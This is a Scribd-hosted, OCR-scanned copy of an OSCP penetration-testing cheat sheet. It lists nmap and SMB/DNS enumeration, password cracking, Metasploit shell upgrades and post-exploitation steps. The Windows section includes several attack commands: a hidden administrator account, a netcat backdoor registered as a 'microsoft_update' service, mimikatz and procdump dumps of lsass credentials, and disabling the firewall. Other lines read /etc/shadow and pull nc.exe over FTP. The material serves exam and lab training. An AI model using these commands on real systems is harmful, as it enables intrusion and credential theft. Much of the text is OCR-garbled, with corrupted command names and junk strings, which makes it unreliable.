Scribd
Upload
754 views14 pages

OSCP Cheat Sheet - Thor-Sec

OSCP_Cheat_Sheet_-_Thor-Sec

Uploaded by

Luis Gustavo Segundo Ortiz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
754 views14 pages

OSCP Cheat Sheet - Thor-Sec

OSCP_Cheat_Sheet_-_Thor-Sec

Uploaded by

Luis Gustavo Segundo Ortiz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
  • Pre Exploitation: Introduces the initial commands useful for pre-exploitation in cybersecurity tasks, preparing phases of scanning and reconnaissance.
  • Service Enumeration: Details commands and tools for enumerating information on services running on target systems, particularly SMB/RPC services.
  • Exploitation: Provides guidelines for exploiting vulnerabilities such as SQL injection, SMTP relay abuse, SNMP weaknesses, FTP misconfigurations, and DNS issues.
  • Password Cracking: Explains methods and tools for cracking passwords using tools like John the Ripper, Hydra, and Medusa.
  • Shell Exploitation: Covers commands for exploiting shell access, including leveraging Metasploit for converting shells to Meterpreter.
  • Reverse Shell Techniques: Demonstrates techniques for reversing shell accesses to regain control over the targeted systems.
  • Post Exploitation: Contains commands for looting information post-exploitation, extracting valuable data from compromised hosts.
  • Other Tools and Tricks: Includes various additional techniques such as packet sniffing and configuring Kali Linux for optimizing attack strategies.
OSCP Cheat Sheet Here are some commands that I found helpful during the OSCP. | encourage you to take a look at the resource links that I've posted here to go in further detail in many of these topics. Pre Scanning Quick Pass map --top-ports 10 --vpen Intense scan nmap -p 1-65535 -T4 -A -v Web nitko -h dirb http:// /usr/share/wordlists/dirb/ finmap -u -/dotdotpun.pl -m -h [OPTIONS] wpscan -url http:/// ~enunerate p File Include Resource 1 (https://evitzone.org/tutorials/remote-file-inclusion%28rfi%29/) File Include Resource 2 (http://www-hackersonlineclub.com/Ifi-rfi) File Include Resource 3 (https://Oxzoidberg.wordpress.com/category/security/Ifi-rf/) SMB/RPC enumalinux a map --script=snb* -p epeclient -U"" -N showmount -e / mount -t cifs //<1P>/ -o username=" guest” password: net view \\ nbtscan -r smbclient -L \\ -U login nmblookup -A target repinesecnerateadccais che Peet a sai SQL Injection Cheat Sheet (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet! nmap sv Pn sqlmap -u SMTP. map -script=smtp* -p SNMP snmpwalk -¢ publi snmpenun -t Onesixtyone - ¢ -I FTP nmap -script=ftp* -p ftp: //<1P> DNS repinesecnerateadccais che Peet Backdoor SQL Injection (http://resources infosecinstitute. cam/backdoor-sql-injection/) -/dnsrecon.py -d /dnsrecon.py -4 -t axfr /dnsrecon.py -d -D -t brt -/ansrecon.py -d -t zonewalk nmap script=dns-zone-transfer -p 53 ns2.megacorpone.com nmap -p- ~sV --reason --dns-server 1.2.3.4 Pass-the-Hash pth-winexe -U // ond During Password Cracking Discover type of hash that you have hash-identifier John the Ripper /etc/shadow cracking © Create a file with passwd © Create file with shadow ‘= Combine into one document unsnadow John —owordlist-cany word 14st> -P -v ssh Medusa Medusa -h -U PASS FILE> http -m DIR: /admin Hashcat hashcat -m 400-2 @ WORD LIST> TTY Shells See TTY Shells (http://thor-sec.com/cheatsheet/tty_spawnage/) section Metaplsoit Payloads See msfvenom cheat sheet (http://thor-sec.com/cheatsheet/msfvenom_cheat_sheet/) section repinesecnerateadccais che Peet oo Metasploit commands ETT getutd search F *passt.txt shell getprivs session -i 1 —puts you back into your session Turn a regular shell into a meterpreter shell + Attacker © use expott/nutts handler © set payloas windous/sneLi/revese_tep © set tpoce cont> + Target + Attacker © Cirl+Z (to background session) © sessions 1 (this wl st your sessions to verify which one itis) © sete ehost © sete anost © _sesstons -u 1 (the 1is the session number) Netcat See Netcat cheat sheet (http://thor-sec.com/cheatsheet/netcat_cheatsheet/) section Useful Windows Commands repinesecnerateadccais che Peet net view net user net localgroup Users net localgroup Administrators net user hacker password /add net localgroup adninistrators hacker /add search dir/s *.doc system(“start end.exe /k Send”) sc create microsoft_update binpath.”cnd /K start ¢:\nc.exe -d -e cnd.exe” starts auto error C:\ne.exe -e c:\windows\system32\cnd.exe -vv minikatz.exe “privilege: lebug” “log” “sekurls: -Logonpasswords” Procdump.exe -accepteula -ma Isass.exe Isass.dmp minikatz.exe “sekurlsa: :minidump Isass.dnp” “log” “‘sekurlsa::logonpasswords” (32-bit) (64-bit) reg add “hkln\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d a ‘temp\procdump.exe -accepteula -64 -ma Isass.exe Isass.dmp netsh firewall set service renoteadmin enable netsh firewall set service remotedesktop enable repinesecnerateadccais che Peet a netsh Firewall set opmode disable XSYSTEMDRIVEX\boot ini SWINDRIVEX\win. ind type XWINDRIVEX\Systen32\drivers\etc\hosts Useful Nix Commands SUID root files find / -user root -perm -4000 -print SGID root files: find / -group root -perm -2000 -print SUID & SGID files ownership find / -perm -4000 -o -perm -2000 -print Files not owned by anyone find / -nouser -print Files not owned by any group find / -nogroup -print ‘Symlinks and their pointers find / -type 1 -1s Download an EXE from FTP server echo open IP> C:\script.txt echo user myftpusers> C:\script.txt echo pass myftppass>> C:\script.txt echo get _nc.exe>> C:\script.txt echo bye>> C:\script.txt ftp -s:script.txt repimesecamrateaascais che Peet Shells See resources (http://thor-sec.com/review/oscp_review/#resource) section Reverse Shell Cheat Sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) Post Windows loo’ ig (brief) systeninfo type boot int hostname ipconfig /all netstat -ano net users net localgroup route print arp “A netsh firewall show state netsh firewall show config repinesecnerateadccais che Peet woe schtasks /query /fo LIST /v schtasks /query /fo LIST /v net start accesschk.exe -ucqv “Authenticated Users" * dir network-secret.txt /s windump - 2 -w capture -n -U -s @ sre not and dst not Nix looting (brief) locate proof. txt/network-secret. txt find -name "proof. txt"/"network-secret txt” uname -a cat_/proc/version cat_/etc/passwd cat_/etc/shadow cat_/etc/group As -alk | grep “4 ifconfig -a netstat -ano cat_/etc/hosts repinesecnerateadccais che Peet arp tepdump <1 eth@ -w capture 5 0 sre not

and dst not <1P> tepdunp etho sre not and dst not _<1P> Packet Sniffing tcpdump -i tap@ host <1P> tcp port 8@ and not arp and not icmp -vww tcpdump -i ethe -w capture -n -U ~s @ src not and dst not tcpdump eth® sre not and dst not Other Quick Kali Configuration SSH = Start Stop service sh stop HTTP Service repinesecnerateadccais che Peet Start = Verify its running hetoi//327.0.0.4 = Directory Narivww! * Stop Update boot sequence update-re-d ssh enable update-rc.d apache2 enable ecconf (GUE) Compiling Exploits 32-bit gcc _-m32_-o output32 hell 64-bit gcc -o output hello.c Windows Comp! d_/root/.wine/drive_c/Mingw/bin wine gcc -o exploit.exe /tmp/exploit.c -Iwsock32 wine exploit.exe Tags: | OSCP (mipynrors gsitoxcp %& Categories: | Cheatsheet tp/thor seccom/categores/¥cheatshee #2) Updated: July 18, 207 LeAVEA COMMENT Your email address will not be published. Required fields are marked * Comment * Name * repinesecnerateadccais che Peet

You might also like